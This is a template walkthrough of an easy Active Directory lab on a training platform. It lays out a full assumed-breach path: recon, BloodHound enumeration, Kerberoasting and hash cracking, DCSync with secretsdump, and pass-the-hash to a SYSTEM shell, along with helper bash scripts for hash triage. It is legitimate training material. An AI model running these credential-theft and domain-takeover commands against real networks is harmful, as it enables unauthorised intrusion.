Lab: Welcome · Platform: Active Directory · Difficulty: Easy · Provider: HackSmarter
This is a template walkthrough: replace the placeholder values (<TARGET_IP>, hashes, flags) with your own findings as you work the box. Keep the structure; it mirrors how a real engagement is documented.
Overview
Welcome is the on-ramp to the HackSmarter Active Directory series. It’s an assumed-breach scenario: you start with a low-privileged domain credential and work toward Domain Admin by chaining standard AD misconfigurations. The goal isn’t a single trick — it’s drilling the enumeration → foothold → privilege-escalation loop until it’s muscle memory.
Skills exercised

- AD enumeration (BloodHound / ldapsearch / nxc)
- SMB and LDAP recon
- Credential abuse and lateral movement
- Mapping an attack path to Domain Admin
1. Recon

1.1 Initial port scan
Always start broad, then go deep on what’s open.
```bash
# Full TCP scan, then service/version scan on discovered ports
mkdir -p nmap
nmap -p- --min-rate 2000 -oA nmap/alltcp <TARGET_IP>
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269 -sCV -oA nmap/svc <TARGET_IP>
```

The classic Domain Controller fingerprint: 53 (DNS), 88 (Kerberos), 389/636 (LDAP/S), 445 (SMB), 464 (kpasswd), 3268/3269 (Global Catalog). That tells you you're looking at a DC before you've touched a single credential. The -sCV pass also runs the default scripts, so the LDAP and SMB script output usually hands you the domain and hostname for the next step. On a lossy VPN link a high --min-rate can drop ports; if the full scan looks thin, rerun it slower before trusting it.
1.2 Pin the domain and hostname

```bash
nxc smb <TARGET_IP>
```

```
SMB  <TARGET_IP>  445  DC01  [*] Windows Server ... (name:DC01) (domain:welcome.hacksmarter.local)
```

Add it to your hosts file so Kerberos and tooling resolve names cleanly:
```bash
echo "<TARGET_IP> dc01.welcome.hacksmarter.local welcome.hacksmarter.local dc01" | sudo tee -a /etc/hosts
```

tee -a appends blindly, so grep /etc/hosts for the name before re-running this; a stale or duplicate entry from an earlier box is a classic source of "why does Kerberos hate me" problems.

2. Authenticated Enumeration
You were handed a starter credential. Validate it first:
```bash
nxc smb <TARGET_IP> -u 'user' -p 'password' --shares
```

A `[+]` from nxc with valid creds is your green light. If you see STATUS_LOGON_FAILURE, recheck the username format (user vs user@domain vs DOMAIN\user). If you are authenticating with Kerberos (-k), also check clock skew: the KDC rejects requests more than five minutes off, so sync first with sudo ntpdate <TARGET_IP>. NTLM, which nxc uses by default with -u/-p, does not care about skew, but GetUserSPNs and anything else that talks to port 88 does.
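The next block is an added example, not part of the HackSmarter writeup, covering two steps above at once: the hosts-file entry from 1.2 and reading nxc's verdict on a credential. add_dc_hosts_entry is idempotent (the echo | tee -a version appends a duplicate every time it is re-run), print_krb5_conf emits the krb5.conf realm block you need before switching to -k / Kerberos tooling, and classify_nxc_auth maps one nxc result line to an action. The HOSTS_FILE variable, the function names and the sample nxc lines are assumptions made for this example; the DC name and domain are the ones the page uses.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup. HOSTS_FILE is an assumption so the
# hosts helper can be pointed at a scratch file instead of /etc/hosts.
HOSTS_FILE="${HOSTS_FILE:-/etc/hosts}"

# add_dc_hosts_entry <ip> <short_host> <domain>
# Appends "<ip> <host>.<domain> <domain> <host>" unless the FQDN is already
# present in HOSTS_FILE. Returns 0 written, 2 already present, 1 invalid IP.
add_dc_hosts_entry() {
  local ip="$1" host="$2" domain="$3" fqdn="$2.$3"
  case "$ip" in                       # loose dotted-quad check: stops a literal
    ''|*[!0-9.]*) return 1 ;;         # "<TARGET_IP>" placeholder landing in the file
  esac
  if [ -f "$HOSTS_FILE" ] && awk -v f="$fqdn" '
        /^[[:space:]]*#/ { next }                                   # skip comments
        { for (i = 2; i <= NF; i++) if (tolower($i) == tolower(f)) found = 1 }
        END { exit found ? 0 : 1 }' "$HOSTS_FILE"; then
    return 2
  fi
  printf '%s %s %s %s\n' "$ip" "$fqdn" "$domain" "$host" >> "$HOSTS_FILE"
}

# print_krb5_conf <domain> <dc_fqdn>
# Emits a minimal krb5.conf for the lab realm (realm = upper-cased domain).
# dns_lookup_kdc is off because name resolution here comes from /etc/hosts.
print_krb5_conf() {
  local domain="$1" dc_fqdn="$2" realm
  realm=$(printf '%s' "$domain" | tr '[:lower:]' '[:upper:]')
  cat <<EOF
[libdefaults]
    default_realm = ${realm}
    dns_lookup_kdc = false
[realms]
    ${realm} = {
        kdc = ${dc_fqdn}
        admin_server = ${dc_fqdn}
    }
[domain_realm]
    .${domain} = ${realm}
    ${domain} = ${realm}
EOF
}

# classify_nxc_auth <nxc_result_line>
# Prints ADMIN (valid + Pwn3d!), VALID, BAD_CREDS, CLOCK_SKEW, LOCKED or OTHER.
# Useful inside a loop over a credential list: stop on LOCKED, fix the clock
# on CLOCK_SKEW, and only keep going on VALID/ADMIN.
classify_nxc_auth() {
  case "$1" in
    *'(Pwn3d!)'*)                echo ADMIN ;;
    *'[+]'*)                     echo VALID ;;
    *STATUS_LOGON_FAILURE*)      echo BAD_CREDS ;;
    *KRB_AP_ERR_SKEW*)           echo CLOCK_SKEW ;;
    *STATUS_ACCOUNT_LOCKED_OUT*) echo LOCKED ;;
    *)                           echo OTHER ;;
  esac
}

# Usage (as root, or with HOSTS_FILE pointed at a scratch copy):
#   add_dc_hosts_entry <TARGET_IP> dc01 welcome.hacksmarter.local
#   print_krb5_conf welcome.hacksmarter.local dc01.welcome.hacksmarter.local | sudo tee /etc/krb5.conf
#   classify_nxc_auth "$(nxc smb <TARGET_IP> -u user -p password | grep -E '\[[+-]\]' | head -n 1)"
```

Running add_dc_hosts_entry twice is the point: the second call returns 2 and writes nothing, so it is safe to leave in a setup script you rerun per box.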
2.1 Collect with BloodHound
Graph the domain — it’s the single highest-leverage move in any AD box.
```bash
bloodhound-python -u 'user' -p 'password' -d welcome.hacksmarter.local \
    -ns <TARGET_IP> -c All --zip
```

Import the zip into BloodHound and run the pre-built queries:
- Find Shortest Paths to Domain Admins
- Find Principals with DCSync Rights
- Shortest Paths from Owned Principals
Mark your starting user as Owned, then let the graph show you the path.
2.2 Users, shares, and quick wins
```bash
# Enumerate domain users
nxc smb <TARGET_IP> -u 'user' -p 'password' --users
# Spider readable shares for loot (configs, scripts, creds)
nxc smb <TARGET_IP> -u 'user' -p 'password' -M spider_plus
```

spider_plus only inventories the shares by default and writes the listing to the output folder it prints; to actually pull the files down add -o DOWNLOAD_FLAG=True. Read --users output for description fields too: easy labs like to leave a password in an account's description.

3. Foothold / Privilege Escalation
Document the specific misconfiguration you abused here. On an easy AD lab this is usually one of: Kerberoasting a service account, an ACL edge (e.g. GenericWrite/ForceChangePassword), or readable credentials in a share/GPO.
Example: Kerberoasting, if BloodHound flags an SPN-bearing account:

```bash
# Request service tickets for crackable hashes
impacket-GetUserSPNs welcome.hacksmarter.local/user:password -dc-ip <TARGET_IP> -request -outputfile spns.hash
# Crack offline (13100 = Kerberos 5 TGS-REP etype 23 / RC4)
hashcat -m 13100 spns.hash /usr/share/wordlists/rockyou.txt
```

Check the etype in each $krb5tgs$ line before pointing hashcat at it: mode 13100 only fits etype 23 (RC4). Tickets that come back as etype 17 or 18 (AES) need -m 19600 or -m 19700 and crack far more slowly, so an account that only issues AES tickets is a much poorer Kerberoast target. GetUserSPNs talks Kerberos to the DC, so this is the first step where clock skew will bite.
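An added example, not part of the HackSmarter writeup: the -outputfile from GetUserSPNs can mix etypes, and hashcat will reject lines that do not match the mode you gave it. The helpers below pick the mode from the $krb5tgs$<etype>$ prefix and split a mixed file into one file per mode. The mode numbers are hashcat's own; the sample ticket lines in the test are constructed placeholders with the real line layout but fake data, and the function names are mine.

```bash
#!/usr/bin/env bash
# Added example, not from the writeup. Triages GetUserSPNs -outputfile output
# into per-hashcat-mode files. Mode numbers are hashcat's:
#   13100  Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
#   19600  Kerberos 5 TGS-REP etype 17 (AES128-CTS-HMAC-SHA1-96)
#   19700  Kerberos 5 TGS-REP etype 18 (AES256-CTS-HMAC-SHA1-96)

# tgs_hashcat_mode <hash_line>
# Prints the hashcat mode for one TGS-REP line; returns 1 if the line is not
# a krb5tgs hash with an etype hashcat knows.
tgs_hashcat_mode() {
  case "$1" in
    '$krb5tgs$23$'*) echo 13100 ;;
    '$krb5tgs$17$'*) echo 19600 ;;
    '$krb5tgs$18$'*) echo 19700 ;;
    *) return 1 ;;
  esac
}

# split_tgs_by_mode <infile> <outdir>
# Writes <outdir>/<mode>.hash, one file per etype, and prints "<mode> <count>"
# pairs so you know which hashcat runs to start. Lines that are not recognised
# go to stderr instead of being dropped silently.
split_tgs_by_mode() {
  local infile="$1" outdir="$2" line mode f
  mkdir -p "$outdir"
  while IFS= read -r line || [ -n "$line" ]; do
    [ -z "$line" ] && continue
    if mode=$(tgs_hashcat_mode "$line"); then
      printf '%s\n' "$line" >> "$outdir/$mode.hash"
    else
      printf 'skipping unrecognised line: %.40s...\n' "$line" >&2
    fi
  done < "$infile"
  for f in "$outdir"/*.hash; do
    [ -e "$f" ] || continue
    mode=$(basename "$f" .hash)
    printf '%s %s\n' "$mode" "$(grep -c '' "$f")"   # grep -c '' = portable line count
  done
}

# Usage:
#   split_tgs_by_mode spns.hash tgs_split | while read -r mode count; do
#     hashcat -m "$mode" "tgs_split/$mode.hash" /usr/share/wordlists/rockyou.txt
#   done
```

If the split shows nothing but 19700 entries, do not burn hours on rockyou against AES; go back to BloodHound and look for a cheaper edge first.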
Validate the recovered credential with nxc, then keep moving along the BloodHound path:

```bash
nxc smb <TARGET_IP> -u 'svc_account' -p '<cracked_password>'
```

4. Domain Admin
Once the attack path lands on a privileged principal, dump the domain and prove it:
```bash
# DCSync if you've reached an account with replication rights
impacket-secretsdump welcome.hacksmarter.local/<priv_user>:'<password>'@<TARGET_IP>
```

Add -just-dc (or -just-dc-ntlm for hashes only) when the account has replication rights but is not a local admin on the DC: without it secretsdump also tries the SAM/LSA path over remote registry, which fails noisily and adds nothing you need for the next step.
```bash
# Pass-the-Hash to a SYSTEM shell on the DC
impacket-psexec -hashes :<NTLM_HASH> welcome.hacksmarter.local/administrator@<TARGET_IP>
```

whoami in the resulting shell confirms it:

```
nt authority\system
```

Flags
| Flag | Location | Value |
|---|---|---|
| User | C:\Users\user\Desktop\user.txt | REDACTED |
| Root | C:\Users\Administrator\Desktop\root.txt | REDACTED |
Lessons Learned
- BloodHound first. On AD, the graph turns a maze into a straight line. Always mark owned principals.
- Credential hygiene is the vuln. Easy AD boxes almost always hinge on a reused/weak/exposed credential, not an exploit.
- Kerberos is time-sensitive. Sync your clock to the DC before anything Kerberos-related.